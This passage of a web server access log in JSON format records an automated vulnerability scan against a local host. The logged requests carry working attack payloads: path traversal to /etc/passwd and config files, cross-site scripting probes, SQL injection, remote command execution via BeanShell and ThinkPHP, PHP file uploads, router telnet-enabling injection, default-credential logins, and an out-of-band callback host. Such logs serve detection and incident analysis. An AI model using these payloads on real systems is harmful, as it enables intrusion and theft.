+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"c9v8gc8smpv8b0ng0t0067f43ixka66rs.oast.online","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_dashboards/app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=.....///http/.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-----------------------------5825462663702204104870787337\x0D\x0AContent-Disposition: form-data; name=\x22employee_ID\x22; filename=\x22poc.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------5825462663702204104870787337--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/uploadID.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C../ssl/yaws-key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/admin/system.users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C\x5C..\x5C\x5C..\x5C\x5Cconfig\x5C\x5Cconfig_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MFkiOqxTd2khQTpksbQBx6Vq.php\x22\x0D\x0A\x0D\x0A297MFnLWJWHNV02kmhgQieZG2EK\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A297MFkiOqxTd2khQTpksbQBx6Vq.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hub/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 